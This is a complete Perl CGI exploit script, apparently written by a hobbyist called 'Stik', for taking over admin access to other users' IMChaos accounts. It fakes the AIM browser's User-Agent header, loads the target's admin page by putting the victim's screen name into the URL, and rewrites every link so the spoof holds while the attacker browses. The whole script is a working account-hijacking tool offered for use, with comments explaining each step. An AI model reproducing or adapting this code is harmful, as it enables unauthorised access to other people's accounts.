#!/usr/bin/perl ## IMChaos.cgi ## Exploit to gain admin access to any IMChaos account ## Spoofs the AIM Browser Window ## Written by: Stik use HTTP::Request; use LWP::UserAgent; ## Includes the above modules to be used in the script print "Content-type: text/html\n\n"; ## To output as an HTML Page, this is necessary $agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)'; ## UserAgent String of the AIM Window $tmp = $ENV{'QUERY_STRING'}; ## URL of the hyperlink clicked, blank if no hyperlink was clicked if($tmp ne ""){ ## The following keeps the browser spoofed when hyperlinks are clicked $tmp =~ s/link=//g; ## Removes the word "link=" from the URL of the clicked hyperlink $listurl1 = $tmp; ## URL of the clicked hyperlink $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1; ## Spoof the AIM Profile UserAgent as the UA of the current browser $request = HTTP::Request->new(GET => "$listurl1"); $content = $ua->request($request)->content; ## Request the HTML of $listurl1, the clicked hyperlinked page print "$content
"; ## Display the page as it would be seen in the AIM window } else { ## The Normal Spoofed page, before any hyperlinks are clicked $listurl = 'http://dilutedweb.com/m.php?a=AdminScreenName&b=SETOFLETTERS'; ## $listurl MUST be the hyperlink url with the profile holder's SN in place of yours $ua = new LWP::UserAgent agent=>$agent, env_proxy=>1; ## Spoof the AIM Profile UserAgent as the UA of the current browser $request = HTTP::Request->new(GET => "$listurl"); $content = $ua->request($request)->content; ## Request the HTML of $listurl, the Admin IMChaos Page $content =~ s/\href=\"/href="IMChaos.cgi?link=/g; ## Replace all links with code to keep the browser spoofed as AIM print "$content
"; ## Display the page as it would be seen in the AIM window }